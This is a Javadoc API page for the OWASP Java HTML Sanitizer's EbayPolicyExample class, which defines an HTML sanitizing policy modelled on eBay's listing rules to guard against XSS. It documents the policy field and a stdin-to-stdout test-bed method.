Package org.owasp.html.examples
Class EbayPolicyExample
- java.lang.Object
-
- org.owasp.html.examples.EbayPolicyExample
-
public class EbayPolicyExample extends Object
Based on the AntiSamy EBay example.eBay (http://www.ebay.com/) is the most popular online auction site in the universe, as far as I can tell. It is a public site so anyone is allowed to post listings with rich HTML content. It's not surprising that given the attractiveness of eBay as a target that it has been subject to a few complex XSS attacks. Listings are allowed to contain much more rich content than, say, Slashdot- so it's attack surface is considerably larger. The following tags appear to be accepted by eBay (they don't publish rules):
<a>
,...
-
-
Field Summary
Fields Modifier and Type Field Description static PolicyFactory
POLICY_DEFINITION
A policy that can be used to produce policies that sanitize to HTML sinks viaPolicyFactory.apply(org.owasp.html.HtmlStreamEventReceiver)
.
-
Constructor Summary
Constructors Constructor Description EbayPolicyExample()
-
Method Summary
All Methods Static Methods Concrete Methods Modifier and Type Method Description static void
main(String[] args)
A test-bed that reads HTML from stdin and writes sanitized content to stdout.
-
-
-
Field Detail
-
POLICY_DEFINITION
public static final PolicyFactory POLICY_DEFINITION
A policy that can be used to produce policies that sanitize to HTML sinks viaPolicyFactory.apply(org.owasp.html.HtmlStreamEventReceiver)
.
-
-
Method Detail
-
main
public static void main(String[] args) throws IOException
A test-bed that reads HTML from stdin and writes sanitized content to stdout.- Throws:
IOException
-
-